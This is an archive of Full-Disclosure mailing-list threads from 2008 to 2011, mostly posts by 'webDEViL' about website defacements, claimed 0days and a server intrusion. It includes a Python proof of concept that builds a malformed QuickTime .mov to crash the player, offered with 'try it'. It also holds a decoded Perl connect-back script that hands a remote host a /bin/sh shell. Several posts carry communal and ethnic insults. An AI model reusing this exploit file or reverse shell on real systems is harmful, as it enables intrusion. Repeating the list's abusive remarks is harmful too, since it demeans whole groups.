Re: [Full-disclosure] SOngs.pk Hacked ! By Indian Hacker Team (Due to Mumbai Terror)
I always had a feeling pirates were behind such attacks. But music pirates seems to be a bit too much. On Fri, Jul 15, 2011 at 10:09 PM, Silic0n wrote: > http://songs.pk/usersonline/usersonline.php > > Hacked > > BY:*Mr52, R00t_d3vil , InX_rOot , -[SiLeNtp0is0n]- ,Lucky, Silic0n , > Ne0_h4ck3r , dodo, and Team ICA * > > Pray for all the innocent victims of Mumbai attack .. > This is a small answer from All Indians.. Remember we are Together.. > You can just kill innocent people .. Women & Childrens.. > But There is no Future for you.. We are coming with huge speed.. > Corruption will be under control.. Every Indian will have Money n Power.. > Then there will be no one to Save you.. > You are dirty stamp on Pure Islam.. Try to Understand & Respect it.. > Just Remember We are coming > Bye .. > Exit > _ > > > Submit Your comment here .. > <http://www.anvilbook.com/guestbook.php?mumbai> > Use Proper language. > > > > > Comment here http://www.anvilbook.com/guestbook.php?mumbai > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Regards, webDEViL http://twitter.com/w3bd3vil ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CCAvenue.com Payment Gateway Vulnerable SQL Injection UPDATE
Let's trust software from Microsoft or Apple. On Thu, May 19, 2011 at 12:33 PM, David Blanc wrote: > On Sat, May 7, 2011 at 6:53 PM, Xa Buri wrote: > > > > So who finally did it and when? ispy or d3hydr8? and I still don't buy > the > > whole SQL Injection theory. There is no proof. Looks more like an insider > > dump. > > > > Never trust an Indian software company. > > http://hackerstreet.in/item?id=6323 > > http://blog.susam.in/2011/05/infosys-tcs-or-wipro.html > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Regards, webDEViL http://twitter.com/w3bd3vil ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Real Player 0day for WinXP
You should read on same origin policy or activex kill bits. Bypassing that is considered a vulnerability. Sent from my iPhone On Jul 9, 2010, at 12:17 AM, mutiny wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > It's not a new vulnerability. It's just a new exploit. Quit > bitching. > webDEViL wrote: >> I will leave that upto you to understand. >> >> >> Sent from my iPhone >> >> On Jul 8, 2010, at 11:00 PM, Shreyas Zare >> wrote: >> >>> Hi, >>> >>> And how is this real player 0day when you are exploiting windows hcp >>> vulnerability? >>> >>> Regards, >>> >>> Shreyas Zare >>> >>> Sr. Information Security Researcher >>> Secfence Technologies >>> www.secfence.com >>> >>> >>> On Thu, Jul 8, 2010 at 12:13 PM, webDEViL >>> wrote: >>>> http://krash.in/real-exp/exploit.ram >>>> Uses MS Help vuln. >>>> >>>> --webDEViL >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > -BEGIN PGP SIGNATURE- > Version: GnuPG v1.4.9 (MingW32) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ > > iQIcBAEBAgAGBQJMNh1fAAoJEEfSyjOIQyn5rx8QAKqn7iRNdEXszE8e8mOTPOcv > Cm/ZDhc55dzRXo+2f3lzhI71UkJ71OAxefZErqjTtzbb74SdRrqe+Y0gMonuRe7Q > HiqyzowO/5DMd9HSUrNgsIjrs+qM4ppwQP46iEw/72KCT17Ts8Xo3o8jR/qu889N > jXgUkup6xfL2ZCcSC91RGCOUUq79whcBkQZBLLKKKyUq4mdV8xR1/lFiTwHqDmqy > btJHCAmBgfCzVRYQRdRLnGgW2Yvb013KQDhvC0a1+RfFEcEZqA6y1h2lbdnuo/q9 > 91VbC/zbNq7yhjOCrPvn26MSRj9GpP0LLNeG5QLK09ABVOudLvmeFQJ6+xaw5uPJ > PZVcT/d1h1GPpqkUIGzeVoIZ6IPd1+DkL7UYOmsxClubtI+829aaRnci853U8X1Z > 81DYTRRMSrxEuNHONAJhVJDBbHPy70Pas98jlP+/A5++8iJjhOyDQgitWO64wRKK > 7+nAP1PRRr4+zqJDwvPXA+3nlCypwKclvuC+t2YgDsl9ynbzjCPm9jZLUiToUDCl > YxqXv9388DaM1O+9T7DsrO19O8X6OfuANIq0NgYKm6sLjSwUq06c9V6NBvIP8OLo > D4YjCH3LzezF2Z/N/Sewx0tx46WOmWFd/6bA2h9lgETEGIEYniRVsRVMGeT1rEbb > qGtGhp+b7Bsi4+O7lEM9 > =GG49 > -END PGP SIGNATURE- > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Real Player 0day for WinXP
I will leave that upto you to understand. Sent from my iPhone On Jul 8, 2010, at 11:00 PM, Shreyas Zare wrote: > Hi, > > And how is this real player 0day when you are exploiting windows hcp > vulnerability? > > Regards, > > Shreyas Zare > > Sr. Information Security Researcher > Secfence Technologies > www.secfence.com > > > On Thu, Jul 8, 2010 at 12:13 PM, webDEViL wrote: >> >> http://krash.in/real-exp/exploit.ram >> Uses MS Help vuln. >> >> --webDEViL ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Real Player 0day for WinXP
http://krash.in/real-exp/exploit.ram Uses MS Help vuln. --webDEViL ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Egurra: A dumb file format fuzzer
Has this got anything different than filefuzz released years ago! Sent from my iPhone On Jun 3, 2010, at 5:08 PM, Jon wrote: > Hello FD, > > As a personal exercise I wrote a Python based "dumb" file format > fuzzer. > It's mechanics are simple and robust and it's modular design allows > you > to fuzz any app that gets input files as a parameter. > You can get a copy of it and a more elaborated explanation at > http://www.morenops.com/?p=673 > > Cheers, > > -- > jg - www.morenops.com > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] denial-of-service vulnerability in the Microsoft Malicious Software Removal Tool
All said and done, that doesn't make it a vulnerability. On Sun, May 23, 2010 at 11:47 PM, lsi wrote: > On 23 May 2010 at 16:34, Thor (Hammer of God) wrote: > > From: "Thor (Hammer of God)" > To: "full-disclosure@lists.grok.org.uk" disclos...@lists.grok.org.uk> > Date sent: Sun, 23 May 2010 16:34:24 + > Subject:Re: [Full-disclosure] denial-of-service > vulnerability in the >Microsoft Malicious Software Removal Tool > > > And where's the part where the system was rendered unbootable? > > The unbootable part comes when you replace NDIS.SYS. Unless you know > to replace the registry keys first, which is certainly not obvious > from the MRT log. > > > And how did your users get infected with Cutwail? Let me guess... > > they are all still running XP and you've got them running as local > > administrators right? And they get to download codecs "willy nilly" > > and are probably using Bittorrent to get illegal copies of software > > pre-infected with cutwail, right? > > How do I know how they got infected? These are all third-party > companies (my customers), sometimes when they have cash problems, > they don't call me, they try and do it themselves, or do nothing. I > might not see them for months. They don't want to upgrade - they > heard about Vista (LOL) and they don't have, or don't want to spend > the money. > > This is reality, not some managed datacentre in Redmond. > > > local administrators > > Their apps needed it last I checked. I didn't set up their machines. > They have not asked me to look at that. I have enough trouble > getting work OK'd without putting my neck on the line suggesting a > configuration change which I cannot guarantee will not cause > instability, particularly with their legacy and unsupported software, > of which there is plenty. > > Again, this is reality, not some managed datacentre in Redmond. > > > Bittorrent > > No, like this: > > "Stuart, need your help. My computer has a virus. Yesterday night I > opened an email that I was expecting from a Bernice. It turned out > that it was the wrong Bernice and it was a virus. It loaded Security > Essentials 2010 which is a scarevirus to make the user believe that > there are virus a pay for their software which does nothing anyway. > It has loaded a virus in the registry file. There is a lot about it > on the net. I then found a PC tools download to remove. However when > I turned mycomputer off it does not now allow me to log on. I have > turned it off. I am without a PC now. Can you come tomorrow to > resolve it for me? Many thanks. Please let me know ad I need it > urgently." > > > Regardless, let's see if we have your advisory correct. In order to > > be a victim of this "Denial of Service Vulnerability" we must first > > get infected with something like Cutwail > > true > > > that runs with user interaction > > false. Cutwail has no known infection vectors. However, Cutwail is > just an example. > > > interaction and also requires administrator privileges (you can see > > that NDIS.SYS was altered). > > When I am logged in as Admin and try to replace NDIS.SYS, Windows > File Protection replaces it. Why did WFP fail to protect the file > against Cutwail in the first place, and how can a virus replace > NDIS.SYS using Administrative privs, if I cannot do it myself when > Administrator? > > > Of course, your AV must be at least 2 years old too. > > false, it was up-to-date, although I am questioning its effectiveness > > > Then, once we get infected with malware, we run MRT, > > and see in the logs that it was successfully removed and requires a > > reboot. > > Actually, AV found the virus in NDIS.SYS but could not remove it. So > I ran MRT because I thought that a Microsoft product would know this > is a Windows file that cannot simply be deleted. MRT says it's done > and needs reboot, so I reboot... and the system is toast. > > To clarify, in this particular case, the first reboot, you can login > in normal mode, but cannot use any network adapters (code 39 - driver > corrupted or missing). Reinstalling the drivers doesn't help. So > then you think, oh that's because NDIS was trashed by MRT, so I'll > just replace NDIS.SYS > > And thats when you get the BSOD on boot to normal mode. So then you > need to figure out that the cause of that BSOD is a missing registry > key, then you need to figure out which keys (there are three, for > each controlset), then you need to get the correct keys from a clean > machine, then you need to figure out how to replace the keys (some of > them cannot be imported with mere Administrative permissions). > > However, just last week I also fixed a problem with the userinit > registry key, also mysteriously deleted - why would a virus trash its > host? Answer: it doesn't, I think it was MRT that trashed it. A > missing userinit key means instant logoff on logon, even in safe mode > as Admi
Re: [Full-disclosure] Microsoft Windows TCP/IP Timestamps Code Execution Vulnerability
That's what binary diffing is all about. Sent from my iPhone On Nov 27, 2009, at 7:59 AM, Ivan Security wrote: > Hi list, > > Has anyone more details about this vulnerability?. The advisory just > say: > "The vulnerability exists due to the TCP/IP stack not cleaning up > state information correctly. This causes the TCP/IP stack to > reference a field as a function pointer when it actually contains > other information" > I'd like to know a bit more in order to test it and make some > research. > > Regards, > > Ivan. > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
A very sad news indeed. On Wed, Nov 4, 2009 at 6:49 PM, Micheal Turner wrote: > We are mourning a good friend today. I first begun talking to str0ke when I > started publishing exploit codes onto this mailing list, he would always be > polite and friendly in his emails. I got to know him over the years and am > saddened by his departure, he contributed to the exploit scene and hacking > subculture in a huge way. The last time I talked with him I asked him if I > could interview him for my blog, he laughed and said he should be > interviewing the exploit writers since he didnt do anything. That was str0ke > and str0ke did alot, he always fought for the rights of the exploit > developers and his website was the bread and butter of many a hackers day. > He will sadly be missed by many people, hackers & friends. > > > At least now we can post exploits without that damn // milw0rm.com comment > being added to the end!!! ;-) I joke, this code is dedicated to you str0ke. > R.I.P my friend. > > > > http://www.hackerfantastic.com/archive/exploits/prdelka-vs-APPLE-ptracepanic.c > > > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail
This particularly came in handy when we had those cable connections wide spread. Basically this is there since the time rediff started. Sent from my iPhone On Sep 10, 2009, at 4:14 PM, kalyan wrote: Dear all is it a good mail?what do you feel guys?.It doesn't encrypting your passwords POST /cgi-bin/login.cgi HTTP/1.1 Host: mail.rediff.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: 1.9.1.3) Gecko/20090824 Firefox/3.5.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/ *;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.rediff.com/ Cookie: RuW=1252586041360329; RsW=IND; RLOC=%5F%5FeZMqPfDceMg%5F %5F4P6Xdf5DkD2%5F%5FtHonjGX8AnI%5F%5Find%5F%5F; Rt=%3D%3DAMwAjN3czN; accounttype=77; Rp=g%3D2%26a%3D24%26c%3D08%26s%3D29%26cn%3D099%26z %3D123456%26p%3D034%26e%3D05%26d%3D_04%26i%3D_35_%26dor %3D20060220%26mi%3D3; RMID=7c7dc92f4aa8f200; RMFS=011MljEWU107fl; app_lang=; ckey=70795 Content-Type: application/x-www-form-urlencoded Content-Length: 63 login=evil.devil&passwd=devil.evil&remember=1&FormName=existing Regards Kalyan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hindustan Times epaper Server Hacked
Maa Ki Kirkiri Congrats to Sky for finding "architectural flaws" in a paper which costs Rs 2.50. Wow, thanks! you saved me $1.5 per month. I owe you one! ;) Btw, my local area library will get me HT papers dated before 2004. If you are against HT "looting" people, why the hell ask them to contact you to correct the "flaws"? Hypocrite "I would like to dedicate this hack towards Club Calvin @ http://www.clubcalv.in and all cute kids" Very Pedo...hahaha wD On Sun, Aug 9, 2009 at 8:56 AM, Sky wrote: > Hindustan Times epaper Server Hacked > http://sky.net.in/hindustan-times-epaper-server-hacked/ > > Hindustan Times (HT) is India’s leading newspaper, published since 1924 > with roots in the independence movement. In 2008, the newspaper reported > that with a (circulation of over 1.14 million) ranking them as the third > largest circulatory daily English Newspaper in India. The Mumbai edition was > launched on 14 July 2005. HT has a readership of (6.6 million) ranking them > as the second most widely read English Newspaper after Times of India. > (Source: Wikipedia article on Hindustan Times) - > http://en.wikipedia.org/wiki/Hindustan_Times > > HindustanTimes + Hindustan epaper Server Hacked > > http://lh4.ggpht.com/_gbWPSul_tCM/Sn5UNhLLVYI/ASM/JY9bc67HV14/s800/hindustan_times_hacked.jpg > > Why was Hindustan Times (HT) epaper Server Hacked ? > > Many people think that Hindustan Times (HT) (English Edition) + Hindustan > (Hindi Edition) is available on the internet free of cost, HT Media has made > it compulsory to register on their website in order to read the daily online > edition of their published newspapers, on completion of registration HT > Media provides you instant access to read daily edition, the CATCH is – you > can only read the daily edition + past seven days editions (from the current > date) as a free user, whileas if you wanna read any edition beyond seven > days, you will have to pay a huge (rip off) amount to HT Media (in the name > of digital archive subscription) > > > Registration Information Collected by HindustanTimes > > http://lh6.ggpht.com/_gbWPSul_tCM/Sn5WIrsZxcI/ASs/Lc6NaQzxEfk/s800/HT_registration.jpg > > Free HindustanTimes Editions > > http://lh6.ggpht.com/_gbWPSul_tCM/Sn5UN35Yx5I/ASU/6THfLaMu00M/s800/HT_free_editions.jpg > > Restricted Access to HindustanTimes epaper Archives > > http://lh4.ggpht.com/_gbWPSul_tCM/Sn5UN5umsJI/ASY/5_SfNzOEm7w/s800/HT_newspaper_subscribe.jpg > > Archive Subscription Charges for HindustanTimes is a total Rip Off > > http://lh4.ggpht.com/_gbWPSul_tCM/Sn5ViIwx2aI/ASo/6TMgKDuc6Vg/s800/HT_archive_charges.jpg > > > As a hacker, i think its not fair (for anyone) to loot common people and > sell (publicly gained) information in such a way, so i decided to peek > inside the server and find some bugs / architectural flaws which would allow > me to access past newspaper (Images / PDF) editions for free > > Within a couple of hours, i managed to find some bugs / architectural flaws > (& vulnerabilities) which gave out free access to the past (Images / PDF) > newspaper editions > > Calvin and Hobbes publishing error > > I used to search the newspaper (HT hard copy) every morning for technology > related news (hoping any Indian journalist must have written some piece) > that went on for like weeks and then i started reading Calvin and Hobbes > (the comic strip) every day published in HT Cafe > > On 2nd / 4th / 9th June, Hindustan Times (HT) published the same Calvin and > Hobbes strip, how should i react against this publishing error by Hindustan > Times, as a fan of Calvin and Hobbes, i expect new comic strip every day > > Checkout the exact same Calvin and Hobbes strip published thrice on various > days in the single month of June (2009) > > 2nd June > > http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/02/538/02_06_2009_538_013.jpg > > 9th June > > http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/09/538/09_06_2009_538_002.jpg > > 4th June > > http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/04/538/04_06_2009_538_006.jpg > > Informing the privileged authorities > > On 10th July 2009, i informed the editor and other top most authorities @ > HindustanTimes via email regarding the serious bugs / flaws (& > vulnerabilities) on their ePaper Server which can be exploited to compromise > data and cause financial losses for HT Media > > My email to HindustanTimes > > http://lh5.ggpht.com/_gbWPSul_tCM/Sn5WJt3UKGI/AS0/KOnhjTtBNnk/s800/my_email_hindustan_times.jpg > > Rashmi Chugh's reply to me > > http://lh4.ggpht.com/_gbWPSul_tCM/Sn5W9mSD0pI/ATI/O5hazb5IIY4/s800/rashmi_livemint_reply.jpg > > Although i received a reply from Rashmi Chugh (Business Head and Publisher, > LIVEMINT) within 3 minutes, i waited for 24 hours to receive other > recipients reply (as i wanted to know what they thought about the issue) but > sadly no one replied back except Rashmi Chug
Re: [Full-disclosure] zf05
Sheer Entertainment!! You get to know stuff that you couldn't have possibly known about your own mates, wrt BHF. On Wed, Jul 29, 2009 at 7:31 AM, Redden Truly wrote: > http://www.leetupload.com/zf05.txt > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered
lol, what makes you think they will fall for it? On Thu, Jul 16, 2009 at 9:01 AM, anti-scared- sheep < securyourbr...@gmail.com> wrote: > Hey she...@fd, > Stop being scared about theses kids, they fucking sucks! > you shoudn't have taken LSD, makes you paranoid even 7 years later, i guess > u guys should consult a doctor. > @anti-sec_kids: This is my server : http://207.182.131.158/index.html > Hack it, and i'll stfu. > While waiting your l33t-prick hack, @reverseDNS on unsecur > shared-webhoster, no wonder i'll laught @you. > > > Die in a fire kids. > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Blackhat-forum.com Hacked - Anti-sec
you got the sitename wrong!! On Wed, Jul 15, 2009 at 8:17 PM, anti sec wrote: > upz i think i did it again, shoutz out to modem peace > > On Wed, Jul 15, 2009 at 10:36 PM, anti sec wrote: > > Blend in. > > Get trusted. > > Trust no one. > > Own everyone. > > Disclose nothing. > > Destroy everything. > > Take back the scene. > > Never sell out, never surrender. > > Get in as anonymous, Leave with no trace. > > > > ~anti-sec > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Apple QuickTime 0day
Try it with your latest quicktime player.
--
#0:000> !exploitable -v
#HostMachine\HostUser
#Executing Processor Architecture is x86
#Debuggee is in User Mode
#Debuggee is a live user mode debugging session on the local machine
#Event Type: Exception
#Exception Faulting Address: 0x66830f9b
#First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC0FD)
#
#Faulting Instruction:66830f9b push ebx
#
#Basic Block:
#66830f9b push ebx
# Tainted Input Operands: ebx
#66830f9c push ebp
#66830f9d mov ebp,dword ptr +0x41f (0420)[esp]
#66830fa4 push esi
#66830fa5 push edi
#66830fa6 mov edi,ecx
#66830fa8 cmp edi,offset +0x5ff (0600)
#66830fae mov ebx,edx
#66830fb0 mov dword ptr [esp+14h],eax
#66830fb4 mov byte ptr [esp+10h],0
#66830fb9 mov byte ptr [esp+11h],0
#66830fbe mov byte ptr [esp+12h],0
#66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4)
#
#Exception Hash (Major/Minor): 0x614b6671.0x614b786e
#
#Stack Trace:
#QuickTime!DllMain+0x2fabb
#+0x1231137
#Instruction Address: 0x66830f9b
#
#Description: Stack Overflow
#Short Description: StackOverflow
#Exploitability Classification: UNKNOWN
#Recommended Bug Title: Stack Overflow starting at
QuickTime!DllMain+0x2fabb (Hash=0x614b6671.0x614b786e)
print "--"
print "w3bd3vil [at] gmail [dot] com"
print "Apple QuickTime CRGN Atom 0day"
print "--"
bytes = [
0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70,
0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67,
0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00,
0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00,
0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02,
0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B,
0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF,
0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00,
0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00,
0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63,
0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00,
0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00,
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72,
0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ]
f = open("webDEViL.mov", "wb")
for byte in bytes: f.write("%c" % byte)
f.close()
print "webDEViL.mov created! (%d bytes)" % len(bytes)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] connect back PHP hack
Must be off the r57 php shell.
Regards,
webDEViL
On Wed, Feb 11, 2009 at 12:14 AM, Razi Shaban wrote:
> On Tue, Feb 10, 2009 at 8:23 PM, sr. wrote:
> > can anyone tell me what encoding this is?
> >
> >
> $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
> >
> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
> >
> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
> >
> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
> >
> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
> >
> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
> > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
> >
> > this has to do with old php 4.x.x version with magic quotes enabled.
> > i'm just trying to figure out what the connect back code does.
> >
> > any input is much appreciated.
> >
> > thx,
> >
> > sr.
> >
>
> Base64, the "==" at the end gives it away. It decrypts to:
>
> #!/usr/bin/perl
> use Socket;
> $cmd= "lynx";
> $system= 'echo "`uname -a`";echo "`id`";/bin/sh';
> $0=$cmd;
> $target=$ARGV[0];
> $port=$ARGV[1];
> $iaddr=inet_aton($target) || die("Error: $!\n");
> $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
> $proto=getprotobyname('tcp');
> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
> connect(SOCKET, $paddr) || die("Error: $!\n");
> open(STDIN, ">&SOCKET");
> open(STDOUT, ">&SOCKET");
> open(STDERR, ">&SOCKET");
> system($system);
> close(STDIN);
> close(STDOUT);
> close(STDERR);
>
> --
>
> Regards,
> Razi Shaban
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Indian allegations alarm Pakistan
Everyone knows that, but they are hiding it Thats what Kufr is all about! On Mon, Dec 1, 2008 at 12:03 AM, Qazi Ahmed <[EMAIL PROTECTED]> wrote: > do you have any proof to back your theory? how about you feed your brain > for a change before drawing any conclusion > > India uncovers Hindu terror group that carried out bombings blamed on > Islamists > > http://www.belfasttelegraph.co.uk/news/world-news/india-uncovers-hindu-terror-group-that-carried-out-bombings-blamed-on-islamists-14076306.html > > Crisis May Shift India's Political Landscape > http://www.nytimes.com/2008/11/29/world/asia/29india.html > > > > James Matthews wrote: > > India was attacked the attackers came from Pakistan, I understand why > > Pakistan feels threatened however why would they attack Indian sites? > > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
